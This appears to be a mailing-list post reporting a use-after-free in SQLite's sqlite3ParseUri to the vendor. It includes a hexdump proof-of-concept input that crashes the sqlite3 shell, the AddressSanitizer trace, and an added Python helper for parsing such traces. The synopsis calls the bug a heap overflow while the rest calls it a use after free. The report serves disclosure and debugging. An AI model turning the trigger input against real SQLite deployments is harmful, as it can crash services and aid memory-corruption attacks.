Dear Sqlite team,
Please find attached a second bug report for a use after free() in sqlite.
Kindest regards,
j-
---------------------------------------------------------------------------
*                                                                         *
*                 Sqlite3 use after free vulnerability                    *
*                                                                         *
---------------------------------------------------------------------------
--[ Vulnerability summary:
Date reported to vendor: 27 May 2016
CVE : Not yet
Class: Use after free()
--[ Synopsis:
A heap overflow has been identified in sqlite3.
Version tested : 3.8.9 2015-03-23 21:32:50 0ee2d38deb35aefc55395e86984a9a773caf6218
--[ Vulnerability details:
The sqlite3ParseUri() function is subject to a use after free() vulnerability.
--[ Exploitability:
The vulnerability can consistently be triggered using the PoC reproduced below.
Successful exploitation is heap allocator dependent.
--[ Timeline:
27 May 2016 : Vulnerability reported to vendor.
--[ PoC:
jbrossard@jbrossard-wsl3:~$ xxd /tmp/poc1/poc2.txt
0000000: 2e20 6f70 204a 3378 147b 2929 2970 204a  . op J3x.{)))p J
0000010: 3378 147b 2929 290a 0a0a 0a0a 0a0a 0a0a  3x.{))).........
0000020: 0a0a 0a0a 0a0a 0a0a 3b0a 2e20 6f70 200a  ........;.. op .
0000030: 0a0a 0a0a 0a0a 0a0a 0a0a 0a0a 0a3b 0a2e  .............;..
0000040: 206f 7020 0a0a f60a 0a0a 0a0a 0a0a 0a0a   op ............
0000050: 0a0a 0a0a 0a3b 0a2e 206f 7020 2f20 529a  .....;.. op / R.
0000060: 293b 7020 2f20 529a 293b 206f 7420 2f3b  );p / R.); ot /;
0000070: 272e 106f 7020 7814 7b00 1018 0a2e 206f  '..op x.{..... o
0000080: 7020 2f20 4d9a                           p / M.
jbrossard@jbrossard-wsl3:~$
Note: You might need to compile with a memory allocator monitor such as AddressSanitizer, or run the application after setting the MALLOC_CHECK environment variable, in order to catch this vulnerability.
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ ../../sqlite3/bin/sqlite3_afl32_asan < /tmp/poc1/poc2.txt
=================================================================
==19089==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5600550 at pc 0x82c3389 bp 0xffcb3618 sp 0xffcb360c
READ of size 1 at 0xf5600550 thread T0
    #0 0x82c3388 in sqlite3Strlen30 /home/jbrossard/lab/sqlite3/build/sqlite3.c:23459
    #1 0x82c3388 in sqlite3ParseUri /home/jbrossard/lab/sqlite3/build/sqlite3.c:129866
    #2 0x83e4117 in openDatabase /home/jbrossard/lab/sqlite3/build/sqlite3.c:130235
    #3 0x806c9fe in open_db /home/jbrossard/lab/sqlite3/build/../src/shell.c:1910
    #4 0x8092940 in open_db /home/jbrossard/lab/sqlite3/build/../src/shell.c:3249
    #5 0x8092940 in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:3254
    #6 0x80967a8 in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #7 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #8 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
    #9 0x8065148 (/home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan+0x8065148)
0xf5600550 is located 0 bytes inside of 16-byte region [0xf5600550,0xf5600560)
freed by thread T0 here:
    #0 0xf72d61c4 in __interceptor_free ../../../../../libsanitizer/asan/asan_malloc_linux.cc:62
    #1 0x80b9d1c in sqlite3_free /home/jbrossard/lab/sqlite3/build/sqlite3.c:20942
    #2 0x809288b in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:3257
    #3 0x80967a8 in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #4 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #5 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
previously allocated by thread T0 here:
    #0 0xf72d63e4 in __interceptor_malloc ../../../../../libsanitizer/asan/asan_malloc_linux.cc:72
    #1 0x821a3c2 in sqlite3MemMalloc /home/jbrossard/lab/sqlite3/build/sqlite3.c:17064
    #2 0x810490b in mallocWithAlarm /home/jbrossard/lab/sqlite3/build/sqlite3.c:20733
    #3 0x810490b in sqlite3Malloc /home/jbrossard/lab/sqlite3/build/sqlite3.c:20764
    #4 0x81901d6 in sqlite3StrAccumFinish /home/jbrossard/lab/sqlite3/build/sqlite3.c:22122
    #5 0x82c082c in sqlite3_vmprintf /home/jbrossard/lab/sqlite3/build/sqlite3.c:22233
    #6 0x82c082c in sqlite3_mprintf /home/jbrossard/lab/sqlite3/build/sqlite3.c:22248
    #7 0x80926e8 in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:3252
    #8 0x80967a8 in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #9 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #10 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
SUMMARY: AddressSanitizer: heap-use-after-free /home/jbrossard/lab/sqlite3/build/sqlite3.c:23459 sqlite3Strlen30
Shadow bytes around the buggy address:
0x3eac0050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eac0060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eac0070: fa fa fa fa fa fa 00 00 fa fa 00 00 fa fa 00 00
0x3eac0080: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa 00 00
0x3eac0090: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
=>0x3eac00a0: fa fa fd fd fa fa fd fd fa fa[fd]fd fa fa fd fd
0x3eac00b0: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 fa
0x3eac00c0: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 fa
0x3eac00d0: fa fa 00 00 fa fa 00 04 fa fa 00 fa fa fa 00 00
0x3eac00e0: fa fa 00 04 fa fa 00 fa fa fa 00 00 fa fa 00 04
0x3eac00f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==19089==ABORTING
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$
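To triage a report like the one above, the following added Python helper (written for this page, not part of the report or of SQLite) splits an AddressSanitizer use-after-free report into its faulting-access, free and allocation stacks so the allocation site, the free site and the use site can be compared directly; the embedded report is a constructed, abbreviated copy of the one above.

```python
import re

# Constructed sample: an abbreviated copy of the AddressSanitizer report in this advisory.
SAMPLE_REPORT = """\
==19089==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5600550 at pc 0x82c3389 bp 0xffcb3618 sp 0xffcb360c
READ of size 1 at 0xf5600550 thread T0
    #0 0x82c3388 in sqlite3Strlen30 /home/jbrossard/lab/sqlite3/build/sqlite3.c:23459
    #1 0x82c3388 in sqlite3ParseUri /home/jbrossard/lab/sqlite3/build/sqlite3.c:129866
    #2 0x806c9fe in open_db /home/jbrossard/lab/sqlite3/build/../src/shell.c:1910
0xf5600550 is located 0 bytes inside of 16-byte region [0xf5600550,0xf5600560)
freed by thread T0 here:
    #0 0xf72d61c4 in __interceptor_free ../../../../../libsanitizer/asan/asan_malloc_linux.cc:62
    #1 0x80b9d1c in sqlite3_free /home/jbrossard/lab/sqlite3/build/sqlite3.c:20942
    #2 0x809288b in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:3257
previously allocated by thread T0 here:
    #0 0xf72d63e4 in __interceptor_malloc ../../../../../libsanitizer/asan/asan_malloc_linux.cc:72
    #1 0x80926e8 in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:3252
SUMMARY: AddressSanitizer: heap-use-after-free /home/jbrossard/lab/sqlite3/build/sqlite3.c:23459 sqlite3Strlen30
"""

FRAME_RE = re.compile(r"#\d+\s+0x[0-9a-f]+\s+in\s+(\S+)\s+(\S+?):(\d+)")
ERROR_RE = re.compile(r"ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+)")
REGION_RE = re.compile(r"inside of (\d+)-byte region")

def parse_asan_report(text):
    """Split an ASan report into its use / free / alloc stacks as (func, file, line) tuples."""
    info = {"kind": None, "address": None, "access": None, "region_size": None,
            "stacks": {"use": [], "free": [], "alloc": []}}
    current = None  # which stack the frame lines that follow belong to
    for line in map(str.strip, text.splitlines()):
        if m := ERROR_RE.search(line):
            info["kind"], info["address"] = m.group(1), m.group(2)
        elif m := ACCESS_RE.match(line):
            info["access"], current = (m.group(1), int(m.group(2))), "use"
        elif m := REGION_RE.search(line):
            info["region_size"] = int(m.group(1))
        elif line.startswith("freed by"):
            current = "free"
        elif line.startswith("previously allocated by"):
            current = "alloc"
        elif (m := FRAME_RE.search(line)) and current:
            info["stacks"][current].append((m.group(1), m.group(2), int(m.group(3))))
    return info

def first_frame_in(frames, file_substr):
    """First frame whose source file contains file_substr, e.g. the shell.c site of each event."""
    return next((f for f in frames if file_substr in f[1]), None)
```

Running parse_asan_report on the sample shows the buffer allocated at shell.c:3252 and freed at shell.c:3257 is still reachable from open_db at shell.c:1910, which is the ownership gap to close in the fix.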
_______________________________________________
sqlite-users mailing list
[email protected]
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users